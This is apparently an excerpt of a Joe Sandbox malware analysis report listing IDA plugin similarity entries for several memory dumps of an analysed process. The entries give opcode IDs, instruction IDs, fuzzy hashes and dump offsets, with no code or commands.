                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0bf322826bfd76d81e7692e2408d603620cbec09eedfecc5755ea08fa654c3d
                                                          • Instruction ID: 1bd5ad13d0ebc5d55bde19ee595f3615c8f2c5eeccc0c5587025c07438bbd36f
                                                          • Opcode Fuzzy Hash: e0bf322826bfd76d81e7692e2408d603620cbec09eedfecc5755ea08fa654c3d
                                                          • Instruction Fuzzy Hash: D9D0C914B0FA0F89F539969181B023A659C8F14700F72743ED07F418E1CD1FBB816202
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9375dd49f887e47b27077734699d1be4ab1e17341f3e9b7a38b1a54e197c48b
                                                          • Instruction ID: fbc8ff6417c53f7dcab8b5d65c2715e1c5d4bf9a79ee7277b7bf80f407ddc1e9
                                                          • Opcode Fuzzy Hash: a9375dd49f887e47b27077734699d1be4ab1e17341f3e9b7a38b1a54e197c48b
                                                          • Instruction Fuzzy Hash: AFD0C914B1F99F87F5785682813023A12F99F42700E73243EE05F41AF5CD6E77016A01
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6902be3f3ee48bd7adf79b423a34e450ed48cf9acf4c3b6dac58b7196cd9896f
                                                          • Instruction ID: 4f253913199ade3d828b5d99b9448a4593ad1983823e6bb9663ef9998f6cb7ca
                                                          • Opcode Fuzzy Hash: 6902be3f3ee48bd7adf79b423a34e450ed48cf9acf4c3b6dac58b7196cd9896f
                                                          • Instruction Fuzzy Hash: 43C01220A0E60A8FF225535080B123537548F01300F225475C41A4A8A1CD2776419211
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e81a46880a3cef914d3ed6f0eef1a91ded1eab88694ec73582de08db6820831f
                                                          • Instruction ID: 4d97989990d9bbe9e7275d972e4692f1ae37919f6063d224e6d21de0e4a9f245
                                                          • Opcode Fuzzy Hash: e81a46880a3cef914d3ed6f0eef1a91ded1eab88694ec73582de08db6820831f
                                                          • Instruction Fuzzy Hash: 39C01220A0E64A8BF2255791803122527E59F02340F3340BED80A8AAB6CD6A3A429A11
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction ID: 912b100003ab8edc72455422d24e48457abc8e33b58c22c27ffc3f2bfe6657a3
                                                          • Opcode Fuzzy Hash: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction Fuzzy Hash: C5B09234D9760F42DE3833B149620A47050AB45215FD205B4D408401A5E8AE52D58282
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4124393378.00007FFD9BE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9be10000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be46b0ca993532f40b5eb8a6c92870c33f9e631377ee22268fe86b4c7ec1f3d2
                                                          • Instruction ID: bb94ea85c905a16fe56a969b1ab32bc6c6530a61d70b5c1470cdcf9a8f4fb808
                                                          • Opcode Fuzzy Hash: be46b0ca993532f40b5eb8a6c92870c33f9e631377ee22268fe86b4c7ec1f3d2
                                                          • Instruction Fuzzy Hash: 47C09B41F0F74B67E73215F004B11BD46541F16304B671575D106491F7EC9D6A495251
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.4122054292.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7ffd9ba20000_KSFasOVYpBufeMshBMPdEDfTcvlm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ba15709c7bce199245e9aad1591c37684aff8dc16d5a1c51746c42f582f0d5f
                                                          • Instruction ID: 93b150d58a3581a9ca1cb2d48e6609762cdf1597cc529a9f93fa6968d7cd02c0
                                                          • Opcode Fuzzy Hash: 1ba15709c7bce199245e9aad1591c37684aff8dc16d5a1c51746c42f582f0d5f
                                                          • Instruction Fuzzy Hash: 44B00204ED744F02E47437FA196706D74505B45514FD61170D40D9059598DD56951257